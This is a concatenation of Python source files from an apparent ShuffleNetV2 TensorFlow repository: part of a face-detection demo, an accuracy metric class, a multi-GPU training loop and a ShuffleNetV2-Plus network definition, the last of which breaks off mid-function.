print(pic)
for box_index in range(boxes.shape[0]):
bbox = boxes[box_index]
cv2.rectangle(img_show, (int(bbox[0]), int(bbox[1])),
(int(bbox[2]), int(bbox[3])), (255, 0, 0), 4)
# cv2.putText(img_show, str(bbox[4]), (int(bbox[0]), int(bbox[1]) + 30),
# cv2.FONT_HERSHEY_SIMPLEX, 1,
# (255, 0, 255), 2)
#
# cv2.putText(img_show, str(int(bbox[5])), (int(bbox[0]), int(bbox[1]) + 40),
# cv2.FONT_HERSHEY_SIMPLEX, 1,
# (0, 0, 255), 2)
cv2.namedWindow('res',0)
cv2.imshow('res',img_show)
cv2.waitKey(0)
print(count)
def video_demo(cam_id):
weights = args.model
detector = FaceDetector(weights)
vide_capture = cv2.VideoCapture(cam_id)
while 1:
ret, img = vide_capture.read()
img_show = img.copy()
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
boxes = detector(img, 0.5)
for box_index in range(boxes.shape[0]):
bbox = boxes[box_index]
cv2.rectangle(img_show, (int(bbox[0]), int(bbox[1])),
(int(bbox[2]), int(bbox[3])), (255, 0, 0), 4)
cv2.namedWindow('res', 0)
cv2.imshow('res', img_show)
key=cv2.waitKey(1)
if key==ord('q'):
break
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Start train.')
parser.add_argument('--model', dest='model', type=str, default=None, \
help='the model to use')
parser.add_argument('--img_dir', dest='img_dir', type=str,default=None, \
help='the num of the classes (default: 100)')
parser.add_argument('--cam_id', dest='cam_id', type=int,default=0, \
help='the camre to use')
args = parser.parse_args()
if args.img_dir is not None:
image_demo(args.img_dir)
else:
video_demo(args.cam_id)
``` |
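Condensed from `image_demo` above, a minimal single-image sketch of the `FaceDetector` call pattern; the model path and image name are placeholders.
```python
import cv2
from lib.core.api.face_detector import FaceDetector

detector = FaceDetector('./model.pb')          # placeholder model path
img = cv2.imread('face.jpg')                   # placeholder test image
rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)     # the detector is fed RGB, as in image_demo()
boxes = detector(rgb, 0.3)                     # one row per face: [xmin, ymin, xmax, ymax, score]
for b in boxes:
    cv2.rectangle(img, (int(b[0]), int(b[1])), (int(b[2]), int(b[3])), (255, 0, 0), 2)
cv2.imwrite('face_out.jpg', img)
```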
{
"source": "610265158/shufflenetv2-series-tensorflow",
"score": 3
} |
#### File: core/base_trainer/metric.py
```python
import numpy as np
from lib.helper.logger import logger
class Metric():
def __init__(self,batch_size):
self.batch_size=batch_size
self.top1_correct=0
self.top5_correct = 0
self.total=0
def update(self,top1_acc,top5_acc):
self.top1_correct+=round(top1_acc*self.batch_size)
self.top5_correct += round(top5_acc * self.batch_size)
self.total+=self.batch_size
def report(self):
## report
message=''
message+=('top1 acc:%.6f\n'%(self.top1_correct/self.total))
message+=('top5 acc:%.6f\n' % (self.top5_correct / self.total))
message+=('%d samples \n'%self.total)
logger.info(message)
self.top1_correct = 0
self.top5_correct = 0
self.total = 0
```
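Illustrative use of the `Metric` accumulator above (import path assumed from the file layout): accuracies are weighted by the configured batch size, and `report()` logs the running averages and resets the counters.
```python
from lib.core.base_trainer.metric import Metric  # path assumed from the repo layout

m = Metric(batch_size=128)
m.update(top1_acc=0.75, top5_acc=0.93)   # first batch
m.update(top1_acc=0.80, top5_acc=0.95)   # second batch
m.report()                               # logs top1/top5 over the 256 samples seen, then resets
```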
#### File: core/base_trainer/net_work.py
```python
import tensorflow as tf
import tensorflow.contrib.slim as slim
import time
import numpy as np
import cv2
from train_config import config as cfg
from lib.dataset.dataietr import DataIter
from lib.core.model.net.shufflenet.shufflenetv2plus import ShufflenetV2Plus
from lib.core.model.net.shufflenet.shufflenetv2 import ShufflenetV2
from lib.core.model.net.shufflenet.shufflenetv2_5x5 import ShuffleNetV2_5x5
from lib.helper.logger import logger
from lib.core.base_trainer.metric import Metric
class trainner():
def __init__(self):
self.train_ds=DataIter(cfg.DATA.root_path,cfg.DATA.train_txt_path,True)
self.val_ds = DataIter(cfg.DATA.root_path,cfg.DATA.val_txt_path,False)
self.inputs=[]
self.outputs=[]
self.val_outputs=[]
self.ite_num=1
self._graph=tf.Graph()
self.summaries = []
self.ema_weights = False
self.metric=Metric(cfg.TRAIN.batch_size)
self.train_dict={}
def get_opt(self):
with self._graph.as_default():
##set the opt there
global_step = tf.get_variable(
'global_step', [],
initializer=tf.constant_initializer(0), dtype=tf.int32, trainable=False)
# Decay the learning rate
if cfg.TRAIN.lr_decay == 'cos':
lr = tf.train.cosine_decay(
learning_rate=0.001, global_step=global_step, decay_steps=cfg.TRAIN.lr_decay_every_step[-1])
else:
lr = tf.train.piecewise_constant(global_step,
cfg.TRAIN.lr_decay_every_step,
cfg.TRAIN.lr_value_every_step
)
if cfg.TRAIN.opt=='Adam':
opt = tf.train.AdamOptimizer(lr)
else:
opt = tf.train.MomentumOptimizer(lr, momentum=0.9, use_nesterov=False)
if cfg.TRAIN.mix_precision:
opt = tf.train.experimental.enable_mixed_precision_graph_rewrite(opt)
return opt,lr,global_step
def load_weight(self):
with self._graph.as_default():
if cfg.MODEL.continue_train:
#########################restore the params
variables_restore = tf.get_collection(tf.GraphKeys.MODEL_VARIABLES)
print(variables_restore)
saver2 = tf.train.Saver(variables_restore)
saver2.restore(self._sess, cfg.MODEL.pretrained_model)
elif 'npy' in cfg.MODEL.pretrained_model:
params_dict=np.load(cfg.MODEL.pretrained_model,allow_pickle=True).item()
#########################restore the params
variables_restore = tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=cfg.MODEL.net_structure)
##filter
if cfg.MODEL.cls != 1000:
variables_restore = [x for x in variables_restore if 'classifier' not in x.name]
print(variables_restore)
for i,variables in enumerate(variables_restore):
logger.info('assign %s with np data'%(variables.name) )
self._sess.run(variables.assign( params_dict[variables.name]))
elif cfg.MODEL.pretrained_model is not None :
#########################restore the params
variables_restore = tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=cfg.MODEL.net_structure)
if cfg.MODEL.cls != 1000:
variables_restore=[x for x in variables_restore if 'classifier' not in x.name]
print(variables_restore)
saver2 = tf.train.Saver(variables_restore)
saver2.restore(self._sess, cfg.MODEL.pretrained_model)
else:
variables_restore = tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=cfg.MODEL.net_structure)
print(variables_restore)
                logger.info('no pretrained model, train from scratch')
# Build an initialization operation to run below.
def add_summary(self, event):
self.summaries.append(event)
def tower_loss(self, scope, images, labels, training):
"""Calculate the total loss on a single tower running the model.
Args:
scope: unique prefix string identifying the CIFAR tower, e.g. 'tower_0'
images: Images. 4D tensor of shape [batch_size, height, width, 3].
labels: Labels. 1D tensor of shape [batch_size].
Returns:
Tensor of shape [] containing the total loss for a batch of data
"""
# Build the portion of the Graph calculating the losses. Note that we will
# assemble the total_loss using a custom function below.
if 'ShuffleNetV2_Plus' ==cfg.MODEL.net_structure:
net = ShufflenetV2Plus
elif 'ShuffleNetV2' ==cfg.MODEL.net_structure:
net = ShufflenetV2
elif 'ShuffleNetV2_5x5' == cfg.MODEL.net_structure:
net = ShuffleNetV2_5x5
else:
raise NotImplementedError
logits = net(images,training,include_head=True)
mask=labels>=0
labels = labels[mask]
logits= logits[mask]
onehot_labels=tf.one_hot(labels,depth=cfg.MODEL.cls)
cls_loss=slim.losses.softmax_cross_entropy(logits=logits,onehot_labels=onehot_labels,label_smoothing=0.1)
predicts = tf.nn.softmax(logits=logits)
correct_prediction = tf.equal(tf.argmax(predicts, 1), labels)
top1_accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
top5_correct_prediction = tf.nn.in_top_k(logits, labels, k = 5)
top5_accuracy = tf.reduce_mean(tf.cast(top5_correct_prediction, "float"), name="top5_accuracy")
l2_loss = tf.add_n(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES), name='l2_loss')
### make loss and acc
return cls_loss,top1_accuracy,top5_accuracy, l2_loss
def average_gradients(self,tower_grads):
"""Calculate the average gradient for each shared variable across all towers.
Note that this function provides a synchronization point across all towers.
Args:
tower_grads: List of lists of (gradient, variable) tuples. The outer list
is over individual gradients. The inner list is over the gradient
calculation for each tower.
Returns:
List of pairs of (gradient, variable) where the gradient has been averaged
across all towers.
"""
average_grads = []
for grad_and_vars in zip(*tower_grads):
# Note that each grad_and_vars looks like the following:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
for g, _ in grad_and_vars:
# Add 0 dimension to the gradients to represent the tower.
try:
expanded_g = tf.expand_dims(g, 0)
except:
print(_)
# Append on a 'tower' dimension which we will average over below.
grads.append(expanded_g)
# Average over the 'tower' dimension.
grad = tf.concat(axis=0, values=grads)
grad = tf.reduce_mean(grad, 0)
# Keep in mind that the Variables are redundant because they are shared
# across towers. So .. we will just return the first tower's pointer to
# the Variable.
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def build(self):
with self._graph.as_default(), tf.device('/cpu:0'):
# Create a variable to count the number of train() calls. This equals the
# number of batches processed * FLAGS.num_gpus.
# Create an optimizer that performs gradient descent.
opt, lr, global_step = self.get_opt()
training = tf.placeholder(tf.bool, name="training_flag")
images_place_holder_list = []
labels_place_holder_list = []
# Create an optimizer that performs gradient descent.
# Calculate the gradients for each model tower.
tower_grads = []
with tf.variable_scope(tf.get_variable_scope()):
for i in range(cfg.TRAIN.num_gpu):
with tf.device('/gpu:%d' % i):
with tf.name_scope('tower_%d' % (i)) as scope:
with slim.arg_scope([slim.model_variable, slim.variable], device='/cpu:0'):
images_ = tf.placeholder(tf.float32, [None, cfg.MODEL.hin, cfg.MODEL.win, 3],
name="images")
labels_ = tf.placeholder(tf.int64, [None], name="labels")
images_place_holder_list.append(images_)
labels_place_holder_list.append(labels_)
cls_loss,top1_accuracy,top5_accuracy, l2_loss = self.tower_loss(
scope, images_, labels_, training)
##use muti gpu ,large batch
if i == cfg.TRAIN.num_gpu - 1:
total_loss = tf.add_n([cls_loss, l2_loss])
else:
total_loss = tf.add_n([cls_loss])
# Reuse variables for the next tower.
tf.get_variable_scope().reuse_variables()
##when use batchnorm, updates operations only from the
## final tower. Ideally, we should grab the updates from all towers
# but these stats accumulate extremely fast so we can ignore the
# other stats from the other towers without significant detriment.
bn_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS, scope=scope)
# Retain the summaries from the final tower.
# summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, scope)
summaries = tf.get_collection('%smutiloss' % scope, scope)
# Calculate the gradients for the batch of data on this CIFAR tower.
grads = opt.compute_gradients(total_loss)
# Keep track of the gradients across all towers.
tower_grads.append(grads)
# We must calculate the mean of each gradient. Note that this is the
# synchronization point across all towers.
grads = self.average_gradients(tower_grads)
# Add a summary to track the learning rate.
self.add_summary(tf.summary.scalar('learning_rate', lr))
self.add_summary(tf.summary.scalar('loss', cls_loss))
self.add_summary(tf.summary.scalar('acctop1', top1_accuracy))
self.add_summary(tf.summary.scalar('acctop5', top5_accuracy))
self.add_summary(tf.summary.scalar('l2_loss', l2_loss))
# Add histograms for gradients.
for grad, var in grads:
if grad is not None:
summaries.append(tf.summary.histogram(var.op.name + '/gradients', grad))
# Apply the gradients to adjust the shared variables.
apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
# Add histograms for trainable variables.
for var in tf.trainable_variables():
summaries.append(tf.summary.histogram(var.op.name, var))
if self.ema_weights:
# Track the moving averages of all trainable variables.
variable_averages = tf.train.ExponentialMovingAverage(
0.9, global_step)
variables_averages_op = variable_averages.apply(tf.trainable_variables())
# Group all updates to into a single train op.
train_op = tf.group(apply_gradient_op, variables_averages_op, *bn_update_ops)
else:
train_op = tf.group(apply_gradient_op, *bn_update_ops)
self.inputs = [images_place_holder_list, labels_place_holder_list, training]
self.outputs = [train_op, total_loss, cls_loss,top1_accuracy,top5_accuracy, l2_loss, lr]
self.val_outputs = [total_loss, cls_loss,top1_accuracy,top5_accuracy, l2_loss, lr]
# Create a saver.
# Build an initialization operation to run below.
init = tf.global_variables_initializer()
tf_config = tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=False)
#tf_config.gpu_options.allow_growth = True
tf_config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1
tf_config.intra_op_parallelism_threads = 18
self._sess = tf.Session(config=tf_config)
self._sess.run(init)
def loop(self,):
self.build()
self.load_weight()
with self._graph.as_default():
# Create a saver.
self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=None)
tmp_model_name = cfg.MODEL.model_path + '/cls_for_convert.ckpt'
logger.info('A tmp model saved as %s \n' % tmp_model_name)
self.saver.save(self._sess, save_path=tmp_model_name)
# Build the summary operation from the last tower summaries.
self.summary_op = tf.summary.merge(self.summaries)
self.summary_writer = tf.summary.FileWriter(cfg.MODEL.model_path, self._sess.graph)
min_loss_control=1000.
for epoch in range(cfg.TRAIN.epoch):
self._train(epoch)
val_loss=self._val(epoch)
logger.info('**************'
'val_loss %f '%(val_loss))
#tmp_model_name=cfg.MODEL.model_path + \
# 'epoch_' + str(epoch ) + \
# 'L2_' + str(cfg.TRAIN.weight_decay_factor) + \
# '.ckpt'
#logger.info('save model as %s \n'%tmp_model_name)
#self.saver.save(self.sess, save_path=tmp_model_name)
if 1:
min_loss_control=val_loss
low_loss_model_name = cfg.MODEL.model_path + \
'epoch_' + str(epoch) + \
'L2_' + str(cfg.TRAIN.weight_decay_factor) + '.ckpt'
logger.info('A new low loss model saved as %s \n' % low_loss_model_name)
self.saver.save(self._sess, save_path=low_loss_model_name)
self._sess.close()
def _train(self,_epoch):
for step in range(cfg.TRAIN.iter_num_per_epoch):
self.ite_num += 1
start_time = time.time()
example_images, example_labels = next(self.train_ds)
########show_flag check the data
if cfg.TRAIN.vis:
for i in range(cfg.TRAIN.batch_size):
example_image = example_images[i, :, :, :]
example_label = example_labels[i]
print(example_label)
cv2.namedWindow('img', 0)
cv2.imshow('img', example_image.astype(np.uint8))
cv2.waitKey(0)
fetch_duration = time.time() - start_time
for n in range(cfg.TRAIN.num_gpu):
self.train_dict[self.inputs[0][n]] = example_images[n * cfg.TRAIN.batch_size:(n + 1) * cfg.TRAIN.batch_size, :,:,:]
self.train_dict[self.inputs[1][n]] = example_labels[n * cfg.TRAIN.batch_size:(n + 1) * cfg.TRAIN.batch_size]
self.train_dict[self.inputs[2]] = True
_, total_loss_value, loss_value, top1_acc_value, top5_acc_value, l2_loss_value, learn_rate, = \
self._sess.run([*self.outputs],
feed_dict=self.train_dict)
duration = time.time() - start_time
run_duration = duration - fetch_duration
if self.ite_num % cfg.TRAIN.log_interval == 0:
num_examples_per_step = cfg.TRAIN.batch_size * cfg.TRAIN.num_gpu
examples_per_sec = num_examples_per_step / duration
sec_per_batch = duration / cfg.TRAIN.num_gpu
format_str = ('epoch %d: iter %d, '
'total_loss=%.6f '
'loss=%.6f '
'top1 acc=%.6f '
'top5 acc=%.6f '
'l2_loss=%.6f '
'learn_rate =%e '
'(%.1f examples/sec; %.3f sec/batch) '
'fetch data time = %.6f'
'run time = %.6f')
logger.info(format_str % (_epoch,
self.ite_num,
total_loss_value,
loss_value,
top1_acc_value,
top5_acc_value,
l2_loss_value,
learn_rate,
examples_per_sec,
sec_per_batch,
fetch_duration,
run_duration))
# if self.ite_num % 100 == 0:
# summary_str = self._sess.run(self.summary_op, feed_dict=self.train_dict)
# self.summary_writer.add_summary(summary_str, self.ite_num)
def _val(self,_epoch):
all_total_loss=0
for step in range(cfg.TRAIN.val_iter):
            example_images, example_labels = next(self.val_ds)  # fetch a batch of images and labels from the validation iterator
feed_dict = {}
for n in range(cfg.TRAIN.num_gpu):
feed_dict[self.inputs[0][n]] = example_images[n * cfg.TRAIN.batch_size:(n + 1) * cfg.TRAIN.batch_size, :,:,:]
feed_dict[self.inputs[1][n]] = example_labels[n * cfg.TRAIN.batch_size:(n + 1) * cfg.TRAIN.batch_size]
feed_dict[self.inputs[2]] = False
total_loss_value, loss_value, top1_acc_value, top5_acc_value, l2_loss_value, learn_rate = \
self._sess.run([*self.val_outputs],
feed_dict=feed_dict)
all_total_loss+=total_loss_value-l2_loss_value
self.metric.update(top1_acc_value,top5_acc_value)
self.metric.report()
return all_total_loss/cfg.TRAIN.val_iter
def train(self):
self.loop()
```
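The feed-dict construction in `_train`/`_val` slices one global batch of `num_gpu * batch_size` samples into contiguous per-tower chunks. A NumPy-only illustration of that slicing (shapes and class count are placeholders):
```python
import numpy as np

num_gpu, batch_size = 2, 4                     # stand-ins for cfg.TRAIN.num_gpu / batch_size
images = np.random.rand(num_gpu * batch_size, 224, 224, 3).astype(np.float32)
labels = np.random.randint(0, 1000, size=num_gpu * batch_size)

for n in range(num_gpu):
    tower_images = images[n * batch_size:(n + 1) * batch_size]
    tower_labels = labels[n * batch_size:(n + 1) * batch_size]
    print(n, tower_images.shape, tower_labels.shape)  # (4, 224, 224, 3) (4,) per tower
```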
#### File: net/shufflenet/shufflenetv2plus.py
```python
import tensorflow as tf
import tensorflow.contrib.slim as slim
from train_config import config as cfg
from lib.core.model.net.mobilenetv3.mobilnet_v3 import hard_swish
def torch_style_padding(inputs,kernel_size,rate=1):
'''
    By default TensorFlow uses a different padding scheme from PyTorch,
    so we need to do explicit padding before conv or pool operations.
:param inputs:
:param kernel_size:
:param rate:
:return:
'''
kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1)
pad_total = kernel_size_effective - 1
pad_beg = pad_total // 2
pad_end = pad_total - pad_beg
inputs = tf.pad(inputs,
[[0, 0], [pad_beg, pad_end], [pad_beg, pad_end], [0, 0]])
return inputs
def se(fm,input_dim,scope='really_boring'):
se=tf.reduce_mean(fm,axis=[1,2],keep_dims=True)
with tf.variable_scope(scope):
se = slim.conv2d(se,
input_dim//4,
[1, 1],
stride=1,
activation_fn=tf.nn.relu,
biases_initializer=None,
normalizer_fn=slim.batch_norm,
scope='SE_opr/1')
se = slim.conv2d(se,
input_dim,
[1, 1],
stride=1,
activation_fn=None,
normalizer_fn=None,
biases_initializer=None,
scope='SE_opr/4')
se=tf.nn.relu6(se+3.)/6.
return fm*se
def shuffle(z):
# with tf.name_scope('shuffle_split'):
# shape = tf.shape(z)
# batch_size = shape[0]
# height, width = z.shape[1].value, z.shape[2].value
#
# depth = z.shape[3].value
#
# if cfg.MODEL.deployee:
# z = tf.reshape(z, [ height, width, 2, depth//2]) # shape [batch_size, height, width, 2, depth]
#
# z = tf.transpose(z, [0, 1, 3, 2])
#
# else:
# z = tf.reshape(z, [batch_size, height, width, 2, depth//2])# shape [batch_size, height, width, 2, depth]
#
# z = tf.transpose(z, [0, 1, 2, 4, 3])
#
# z = tf.reshape(z, [batch_size, height, width, depth])
# x, y = tf.split(z, num_or_size_splits=2, axis=3)
# return x, y
with tf.name_scope('shuffle_split'):
z=tf.transpose(z,perm=[0,3,1,2])
shape = tf.shape(z)
batch_size = shape[0]
height, width = z.shape[2].value, z.shape[3].value
depth = z.shape[1].value
if cfg.MODEL.deployee:
z = tf.reshape(z,[batch_size * depth // 2, 2, height * width]) # shape [batch_size, height, width, 2, depth]
z = tf.transpose(z, [1, 0, 2])
z = tf.reshape(z, [batch_size*2, depth // 2, height, width])
z = tf.transpose(z, perm=[0, 2, 3, 1])
x, y = tf.split(z, num_or_size_splits=2, axis=0)
else:
z = tf.reshape(z, [batch_size*depth//2,2, height* width])# shape [batch_size, height, width, 2, depth]
z = tf.transpose(z, [1,0,2])
z = tf.reshape(z, [batch_size*2, depth // 2, height , width])
z = tf.transpose(z, perm=[0, 2, 3, 1])
x, y = tf.split(z, num_or_size_splits=2, axis=0)
return x, y
def shufflenet(old_x,inp, oup, base_mid_channels, ksize, stride, activation, useSE,scope_index=0):
main_scope_list=[['0','3','5'],
['0', '3', '5'],
None,
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
['0', '3', '5'],
None,
['0', '3', '5'],
]
project_scope_list=[['0','2'],
None,
None,
None,
['0', '2'],
None,
None,
None,
['0', '2'],
None,
None, #10
None,
None,
None,
None,
None,
['0', '2'], #16
None,
None,
None,
]
se_scope_list=[None,
None,
None,
None,
None,
None,
None,
None,
['8'],
['8'],
['8'],
['8'],
['8'],
['8'],
['8'],
['8'],
['8'],
['8'],
None,
['8'],
]
    print('executed here')
main_scope=main_scope_list[scope_index]
project_scope = project_scope_list[scope_index]
se_scope=se_scope_list[scope_index]
if stride==1:
x_proj, x = shuffle(old_x)
else:
x_proj = old_x
x = old_x
base_mid_channel = base_mid_channels
outputs = oup - inp
if activation == 'ReLU':
act_func=tf.nn.relu
else:
act_func = hard_swish
##branch main
x = slim.conv2d(x,
base_mid_channel,
[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
biases_initializer=None,
scope='branch_main/'+main_scope[0])
x = torch_style_padding(x, ksize)
x = slim.separable_conv2d(x,
num_outputs=None,
kernel_size=[ksize, ksize],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[1])
x = slim.conv2d(x,
num_outputs=outputs,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[2])
if useSE and activation != 'ReLU':
x=se(x,outputs,scope='branch_main/'+se_scope[0])
if stride == 2:
x_proj = torch_style_padding(x_proj, ksize)
x_proj = slim.separable_conv2d(x_proj,
num_outputs=None,
kernel_size=[ksize, ksize],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_proj/'+project_scope[0])
x_proj = slim.conv2d(x_proj,
num_outputs=inp,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_proj/'+project_scope[1])
res=tf.concat([x_proj,x],axis=3)
return res
def shufflenet_xception(old_x,inp, oup, base_mid_channels, stride, activation, useSE,scope_index=0):
main_scope_list = [None,
None,
['0', '2', '5','7','10','12'],
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
['0', '2', '5','7','10','12'],
]
project_scope_list = [None,
None,
['0', '2'],
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
]
se_scope_list = [None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
None,
['15'],
]
main_scope = main_scope_list[scope_index]
project_scope = project_scope_list[scope_index]
se_scope = se_scope_list[scope_index]
print(se_scope)
print(scope_index)
if stride == 1:
x_proj, x = shuffle(old_x)
else:
x_proj = old_x
x = old_x
base_mid_channel = base_mid_channels
outputs = oup - inp
if activation == 'ReLU':
act_func=tf.nn.relu
else:
act_func = hard_swish
##branch main
x = torch_style_padding(x, 3)
x = slim.separable_conv2d(x,
num_outputs=None,
kernel_size=[3, 3],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[0])
x = slim.conv2d(x,
base_mid_channel,
[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[1])
x = torch_style_padding(x, 3)
x = slim.separable_conv2d(x,
num_outputs=None,
kernel_size=[3, 3],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[2])
x = slim.conv2d(x,
num_outputs=base_mid_channel,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[3])
x = torch_style_padding(x, 3)
x = slim.separable_conv2d(x,
num_outputs=None,
kernel_size=[3, 3],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[4])
x = slim.conv2d(x,
num_outputs=outputs,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='branch_main/'+main_scope[5])
if useSE and activation != 'ReLU':
x = se(x, outputs,scope='branch_main/'+se_scope[0])
if stride == 2:
x_proj = torch_style_padding(x_proj, 3)
x_proj = slim.separable_conv2d(x_proj,
num_outputs=None,
kernel_size=[3, 3],
stride=stride,
padding='VALID',
activation_fn=None,
normalizer_fn=slim.batch_norm,
scope='conv_dp_proj')
x_proj = slim.conv2d(x_proj,
num_outputs=inp,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=act_func,
normalizer_fn=slim.batch_norm,
scope='conv1x1_pw_proj')
res=tf.concat([x_proj,x],axis=3)
return res
def shufflenet_arg_scope(weight_decay=cfg.TRAIN.weight_decay_factor,
batch_norm_decay=0.9,
batch_norm_epsilon=1e-5,
batch_norm_scale=True,
use_batch_norm=True,
batch_norm_updates_collections=tf.GraphKeys.UPDATE_OPS):
"""Defines the default ResNet arg scope.
TODO(gpapan): The batch-normalization related default values above are
appropriate for use in conjunction with the reference ResNet models
released at https://github.com/KaimingHe/deep-residual-networks. When
training ResNets from scratch, they might need to be tuned.
Args:
weight_decay: The weight decay to use for regularizing the model.
batch_norm_decay: The moving average decay when estimating layer activation
statistics in batch normalization.
batch_norm_epsilon: Small constant to prevent division by zero when
normalizing activations by their variance in batch normalization.
batch_norm_scale: If True, uses an explicit `gamma` multiplier to scale the
activations in the batch normalization layer.
activation_fn: The activation function which is used in ResNet.
use_batch_norm: Whether or not to use batch normalization.
batch_norm_updates_collections: Collection for the update ops for
batch norm.
Returns:
An `arg_scope` to use for the resnet models.
"""
batch_norm_params = {
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'scale': batch_norm_scale,
'updates_collections': batch_norm_updates_collections,
'fused': True, # Use fused batch norm if possible.
}
with slim.arg_scope(
[slim.conv2d,slim.separable_conv2d],
weights_regularizer=slim.l2_regularizer(weight_decay),
weights_initializer=slim.variance_scaling_initializer(),
biases_initializer=None,
normalizer_fn=slim.batch_norm if use_batch_norm else None,
normalizer_params=batch_norm_params,):
with slim.arg_scope([slim.batch_norm], **batch_norm_params):
# The following implies padding='SAME' for pool1, which makes feature
# alignment easier for dense prediction tasks. This is also used in
# https://github.com/facebook/fb.resnet.torch. However the accompanying
# code of 'Deep Residual Learning for Image Recognition' uses
# padding='VALID' for pool1. You can switch to that choice by setting
# slim.arg_scope([slim.max_pool2d], padding='VALID').
with slim.arg_scope([slim.max_pool2d], padding='SAME') as arg_sc:
return arg_sc
def ShufflenetV2Plus(inputs,is_training=True,model_size=cfg.MODEL.size,include_head=False):
architecture = [0, 0, 3, 1, 1, 1, 0, 0, 2, 0, 2, 1, 1, 0, 2, 0, 2, 1, 3, 2]
stage_repeats = [4, 4, 8, 4]
if model_size == 'Large':
stage_out_channels = [-1, 16, 68, 168, 336, 672, 1280]
elif model_size == 'Medium':
stage_out_channels = [-1, 16, 48, 128, 256, 512, 1280]
elif model_size == 'Small':
stage_out_channels = [-1, 16, 36, 104, 208, 416, 1280]
else:
raise NotImplementedError
fms=[]
arg_scope = shufflenet_arg_scope(weight_decay=cfg.TRAIN.weight_decay_factor)
with slim.arg_scope(arg_scope):
with slim.arg_scope([slim.batch_norm,slim.dropout], is_training=is_training):
with tf.variable_scope('ShuffleNetV2_Plus'):
input_channel = stage_out_channels[1]
inputs=torch_style_padding(inputs,3)
net = slim.conv2d(inputs,
16,
[3, 3],
stride=2,
padding='VALID',
activation_fn=hard_swish,
normalizer_fn=slim.batch_norm,
scope='first_conv/0')
archIndex=0
feature_cnt=0
for idxstage in range(len(stage_repeats)):
numrepeat = stage_repeats[idxstage]
output_channel = stage_out_channels[idxstage + 2]
activation = 'HS' if idxstage >= 1 else 'ReLU'
useSE = 'True' if idxstage >= 2 else False
for i in range(numrepeat):
with tf.variable_scope('features/%d'%(feature_cnt)):
if i == 0:
inp, outp, stride = input_channel, output_channel, 2
else:
inp, outp, stride = input_channel // 2, output_channel, 1
blockIndex = architecture[archIndex]
archIndex += 1
if blockIndex == 0:
print('Shuffle3x3')
net=shufflenet(net,inp, outp, base_mid_channels=outp // 2, ksize=3, stride=stride,
activation=activation, useSE=useSE,scope_index=feature_cnt)
elif blockIndex == 1:
print('Shuffle5x5')
net =shufflenet(net,inp, outp, base_mid_channels=outp // 2, ksize=5, stride=stride,
activation=activation, useSE=useSE,scope_index=feature_cnt)
elif blockIndex == 2:
print('Shuffle7x7')
net=shufflenet(net,inp, outp, base_mid_channels=outp // 2, ksize=7, stride=stride,
activation=activation, useSE=useSE,scope_index=feature_cnt)
elif blockIndex == 3:
print('Xception')
net=shufflenet_xception(net,inp, outp, base_mid_channels=outp // 2, stride=stride,
activation=activation, useSE=useSE,scope_index=feature_cnt)
else:
raise NotImplementedError
input_channel = output_channel
feature_cnt+=1
fms.append(net)
for item in fms:
print(item)
if not include_head:
return fms
if include_head:
x = slim.conv2d(net,
num_outputs=1280,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=hard_swish,
normalizer_fn=slim.batch_norm,
scope='conv_last/0')
x=tf.reduce_mean(x,axis=[1,2],keep_dims=True)
x=se(x,1280,scope='LastSE')
x = slim.conv2d(x,
num_outputs=1280,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=hard_swish,
normalizer_fn=None,
scope='fc/0')
x=slim.dropout(x,0.8,is_training=is_training)
x=slim.conv2d(x,
num_outputs=cfg.MODEL.cls,
kernel_size=[1, 1],
stride=1,
padding='VALID',
activation_fn=None,
normalizer_fn=None,
scope='classifier/0')
x=tf.squeeze(x, axis=1)
